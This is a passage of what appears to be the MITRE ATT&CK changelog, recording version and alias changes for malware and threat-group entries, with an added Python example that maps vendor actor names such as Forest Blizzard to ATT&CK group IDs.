description: [Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316). → [Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims.(Citation: Lookout-Pegasus)(Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0507] eSurv

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-09-14 15:39:17.698000+00:00 → 2024-03-29 15:07:58.675000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

ics-attack

Minor Version Changes

[S0496] REvil

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-26 20:06:33.317000+00:00 → 2024-04-11 00:15:32.724000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.1 → 2.2

[S0603] Stuxnet

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-20 13:50:55.168000+00:00 → 2024-04-10 23:46:32.577000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.3 → 1.4

[S1009] Triton

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-11-23 14:27:54.711000+00:00 → 2024-04-17 16:12:43.754000+00:00
x_mitre_attack_spec_version: 3.0.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S1010] VPNFilter

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-12 18:30:51.174000+00:00 → 2024-03-07 18:57:15.800000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

Patches

[S0604] Industroyer

Current version: 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-10-17 20:09:38.062000+00:00 → 2024-04-11 16:06:34.700000+00:00
x_mitre_contributors[0]: Dragos Threat Intelligence → Dragos Threat Intelligence

Groups

enterprise-attack

New Groups

[G1028] APT-C-23

Current version: 1.0

Description: [APT-C-23](https://attack.mitre.org/groups/G1028) is a threat group that has been active since at least 2014.(Citation: symantec_mantis) [APT-C-23](https://attack.mitre.org/groups/G1028) has primarily focused its operations on the Middle East, including Israeli military assets. [APT-C-23](https://attack.mitre.org/groups/G1028) has developed mobile spyware targeting Android and iOS devices since 2017.(Citation: welivesecurity_apt-c-23)


[G1023] APT5

Current version: 1.0

Description: [APT5](https://attack.mitre.org/groups/G1023) is a China-based espionage actor that has been active since at least 2007 primarily targeting the telecommunications, aerospace, and defense industries throughout the U.S., Europe, and Asia. [APT5](https://attack.mitre.org/groups/G1023) has displayed advanced tradecraft and significant interest in compromising networking devices and their underlying software including through the use of zero-day exploits.(Citation: NSA APT5 Citrix Threat Hunting December 2022)(Citation: Microsoft East Asia Threats September 2023)(Citation: Mandiant Pulse Secure Zero-Day April 2021)(Citation: Mandiant Pulse Secure Update May 2021)(Citation: FireEye Southeast Asia Threat Landscape March 2015)(Citation: Mandiant Advanced Persistent Threats)


[G1024] Akira

Current version: 1.0

Description: [Akira](https://attack.mitre.org/groups/G1024) is a ransomware variant and ransomware deployment entity active since at least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira](https://attack.mitre.org/groups/G1024) uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement.(Citation: Arctic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Akira](https://attack.mitre.org/groups/G1024) operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of [Akira](https://attack.mitre.org/software/S1129) ransomware indicates multiple overlaps with and similarities to [Conti](https://attack.mitre.org/software/S0575) malware.(Citation: BushidoToken Akira 2023)


[G1021] Cinnamon Tempest

Current version: 1.0

Description: [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked [Babuk](https://attack.mitre.org/software/S0638) source code. [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) may be motivated by intellectual property theft or cyberespionage rather than financial gain.(Citation: Microsoft Ransomware as a Service)(Citation: Microsoft Threat Actor Naming July 2023)(Citation: Trend Micro Cheerscrypt May 2022)(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022)


[G1026] Malteiro

Current version: 1.0

Description: [Malteiro](https://attack.mitre.org/groups/G1026) is a financially motivated criminal group that is likely based in Brazil and has been active since at least November 2019. The group operates and distributes the [Mispadu](https://attack.mitre.org/software/S1122) banking trojan via a Malware-as-a-Service (MaaS) business model. [Malteiro](https://attack.mitre.org/groups/G1026) mainly targets victims throughout Latin America (particularly Mexico) and Europe (particularly Spain and Portugal).(Citation: SCILabs Malteiro 2021)


[G1020] Mustard Tempest

Current version: 1.0

Description: [Mustard Tempest](https://attack.mitre.org/groups/G1020) is an initial access broker that has operated the [SocGholish](https://attack.mitre.org/software/S1124) distribution network since at least 2017. [Mustard Tempest](https://attack.mitre.org/groups/G1020) has partnered with [Indrik Spider](https://attack.mitre.org/groups/G0119) to provide access for the download of additional malware including LockBit, [WastedLocker](https://attack.mitre.org/software/S0612), and remote access tools.(Citation: Microsoft Ransomware as a Service)(Citation: Microsoft Threat Actor Naming July 2023)(Citation: Secureworks Gold Prelude Profile)(Citation: SocGholish-update)


[G1022] ToddyCat

Current version: 1.0

Description: [ToddyCat](https://attack.mitre.org/groups/G1022) is a sophisticated threat group that has been active since at least 2020 using custom loaders and malware in multi-stage infection chains against government and military targets across Europe and Asia.(Citation: Kaspersky ToddyCat June 2022)(Citation: Kaspersky ToddyCat Check Logs October 2023)

Major Version Changes

[G0007] APT28

Current version: 5.0

Version changed from: 4.0 → 5.0


Old Description
[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).

New Description
[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).
Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-26 17:51:20.401000+00:00 → 2024-04-04 19:07:48.903000+00:00
description (old): [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).
description (new): [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 4.0 → 5.0
iterable_item_added
STIX Field: New Value
aliases: Forest Blizzard
aliases: FROZENLAKE
external_references: {'source_name': 'FROZENLAKE', 'description': '(Citation: Leonard TAG 2023)'}
external_references: {'source_name': 'Forest Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references: {'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references: {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
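
The alias additions in this entry and in the entries that follow all share one STIX shape: the vendor name is appended to the group's aliases list, an external_references entry whose source_name is the alias carries a "(Citation: ...)" marker in its description, and a further external_references entry whose source_name matches that citation holds the URL of the source that uses the name. The following Python is an added example, not code from the ATT&CK changelog or the ATT&CK project, that turns intrusion-set objects of this shape into a vendor-name to G-number lookup of the kind a SOC needs when a Microsoft report says "Forest Blizzard" and the detection rules are tagged with ATT&CK IDs. The bundle it reads is constructed by hand from the APT28, APT29 and APT33 entries on this page (only the aliases visible here, with STIX id and other unused fields omitted), and all helper names are the example's own.

```python
"""Resolve vendor threat-actor names to ATT&CK group IDs from STIX intrusion-set objects.

Added example; not code from the ATT&CK changelog or the ATT&CK project. The
sample bundle is constructed by hand and reproduces only the alias additions
visible in this changelog for APT28, APT29 and APT33. It omits STIX 'id',
'created' and other fields this example never reads, so it is not a valid bundle.
"""
import json
import re
from collections import defaultdict

# ATT&CK marks the source of an alias with '(Citation: <source_name>)' markers.
CITATION_RE = re.compile(r"\(Citation:\s*([^)]+)\)")

# Two source references that appear in the changelog entries on this page.
MS_NAMING = {
    "source_name": "Microsoft Threat Actor Naming July 2023",
    "description": "Microsoft. (2023, July 12). How Microsoft names threat actors.",
    "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/"
           "microsoft-threat-actor-naming?view=o365-worldwide",
}
TAG_2023 = {
    "source_name": "Leonard TAG 2023",
    "description": "Billy Leonard. (2023, April 19). Ukraine remains Russia's biggest cyber focus in 2023.",
    "url": "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/",
}


def _sample_group(name, gid, alias_citations, sources):
    """Constructed intrusion-set object in the shape the real bundle uses:
    one 'mitre-attack' reference carrying the G-number, one reference per alias
    whose description cites the source that uses that name, then the sources."""
    refs = [{"source_name": "mitre-attack", "external_id": gid,
             "url": f"https://attack.mitre.org/groups/{gid}"}]
    refs += [{"source_name": alias, "description": f"(Citation: {cited})"}
             for alias, cited in alias_citations.items()]
    refs += sources
    return {"type": "intrusion-set", "name": name,
            "aliases": [name, *alias_citations], "external_references": refs}


SAMPLE_BUNDLE = json.dumps({"type": "bundle", "objects": [
    _sample_group("APT28", "G0007", {"Forest Blizzard": MS_NAMING["source_name"],
                                     "FROZENLAKE": TAG_2023["source_name"]}, [MS_NAMING, TAG_2023]),
    _sample_group("APT29", "G0016", {"Midnight Blizzard": MS_NAMING["source_name"]}, [MS_NAMING]),
    _sample_group("APT33", "G0064", {"Peach Sandstorm": MS_NAMING["source_name"]}, [MS_NAMING]),
]})


def load_groups(bundle_json):
    """Live intrusion-set objects only: revoked and deprecated objects stay in
    the bundle for history and must not feed a lookup table."""
    objects = json.loads(bundle_json).get("objects", [])
    return [o for o in objects if o.get("type") == "intrusion-set"
            and not o.get("revoked", False) and not o.get("x_mitre_deprecated", False)]


def attack_id(obj):
    """G-number from the 'mitre-attack' external reference, or None."""
    return next((r.get("external_id") for r in obj.get("external_references", [])
                 if r.get("source_name") == "mitre-attack"), None)


def alias_source_urls(obj, alias):
    """URLs of the sources ATT&CK cites as using this alias for this group."""
    refs = obj.get("external_references", [])
    by_name = {r.get("source_name"): r for r in refs}
    urls = []
    for ref in refs:
        if ref.get("source_name") != alias:
            continue
        for cited in CITATION_RE.findall(ref.get("description", "")):
            target = by_name.get(cited.strip())
            if target and target.get("url"):
                urls.append(target["url"])
    return urls


def normalize(name):
    """Case- and whitespace-insensitive key; vendor spelling varies (FROZENLAKE, Frozenlake)."""
    return " ".join(name.split()).casefold()


def build_alias_index(groups):
    """normalized alias -> list of {attack_id, name, alias, sources}.
    A list rather than a single hit: ATT&CK does not guarantee that an alias is
    unique across groups, so a caller must treat len(hits) > 1 as ambiguous."""
    index = defaultdict(list)
    for obj in groups:
        gid = attack_id(obj)
        if gid is None:
            continue
        for alias in obj.get("aliases", []):
            index[normalize(alias)].append({"attack_id": gid, "name": obj["name"],
                                            "alias": alias, "sources": alias_source_urls(obj, alias)})
    return dict(index)


def lookup(index, vendor_name):
    """All ATT&CK groups known under vendor_name (empty list if none)."""
    return index.get(normalize(vendor_name), [])


if __name__ == "__main__":
    idx = build_alias_index(load_groups(SAMPLE_BUNDLE))
    for q in ("Forest Blizzard", "midnight blizzard", "Peach Sandstorm", "Sofacy"):
        print(f"{q!r} -> {[(h['attack_id'], h['name']) for h in lookup(idx, q)]}")
```

Against the real enterprise-attack bundle the same functions work unchanged; the only difference is that "Sofacy" and the other pre-existing aliases then resolve too. Keep the list-valued result: collapsing it to a single ID silently picks one group when two share a name.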

[G0016] APT29

Current version: 6.0

Version changed from: 5.0 → 6.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-02 21:33:07.807000+00:002024-04-12 21:15:41.833000+00:00
x_mitre_version5.06.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesMidnight Blizzard
external_references{'source_name': 'Midnight Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
x_mitre_contributorsLiran Ravich, CardinalOps

[G0050] APT32

Current version: 3.0

Version changed from: 2.7 → 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-12 21:15:24.393000+00:002024-04-17 22:07:49.430000+00:00
x_mitre_version2.73.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesCanvas Cyclone
aliasesBISMUTH
external_references{'source_name': 'Canvas Cyclone', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'BISMUTH', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0064] APT33

Current version: 2.0

Version changed from: 1.4 → 2.0


Old Description
[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

New Description
[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)
Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-08 22:07:25.123000+00:00 → 2024-04-11 16:06:34.700000+00:00
description (old): [APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)
description (new): [APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.4 → 2.0
x_mitre_contributors[0]: Dragos Threat Intelligence → Dragos Threat Intelligence
iterable_item_added
STIX Field: New Value
aliases: Peach Sandstorm
external_references: {'source_name': 'Peach Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references: {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0082] APT38

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

New Description
[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_attack_spec_version: (absent) → 3.2.0
x_mitre_deprecated: (absent) → False
values_changed
STIX Field: Old value → New Value
modified: 2022-01-18 17:13:14.610000+00:00 → 2024-04-17 22:08:29.146000+00:00
description (old): [APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
description (new): [APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
x_mitre_version: 2.0 → 3.0
iterable_item_added
STIX Field: New Value
aliases: Sapphire Sleet
aliases: COPERNICIUM
external_references: {'source_name': 'Sapphire Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references: {'source_name': 'COPERNICIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references: {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0096] APT41

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-23 15:45:58.846000+00:002024-04-03 15:20:38.791000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.14.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesBrass Typhoon
aliasesBARIUM
external_references{'source_name': 'Brass Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'BARIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
x_mitre_contributorsNikita Rostovcev, Group-IB

[G0138] Andariel

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-11-30 22:51:40.270000+00:002024-01-08 21:55:29.570000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesPLUTONIUM
aliasesOnyx Sleet
external_references{'source_name': 'PLUTONIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Onyx Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1012] CURIUM

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-12 13:21:41.276000+00:002024-04-17 22:09:00.876000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesCrimson Sandstorm
aliasesTA456
aliasesTortoise Shell
external_references{'source_name': 'Crimson Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Tortoise Shell', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'TA456', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)(Citation: Proofpoint TA456 Defense Contractor July 2021)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references{'source_name': 'Proofpoint TA456 Defense Contractor July 2021', 'description': 'Miller, J. et. al. (2021, July 28). I Knew You Were Trouble: TA456 Targets Defense Contractor with Alluring Social Media Persona. Retrieved March 11, 2024.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media'}

[G0012] Darkhotel

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-17 20:21:44.687000+00:002024-01-08 20:27:56.707000+00:00
x_mitre_version2.13.0
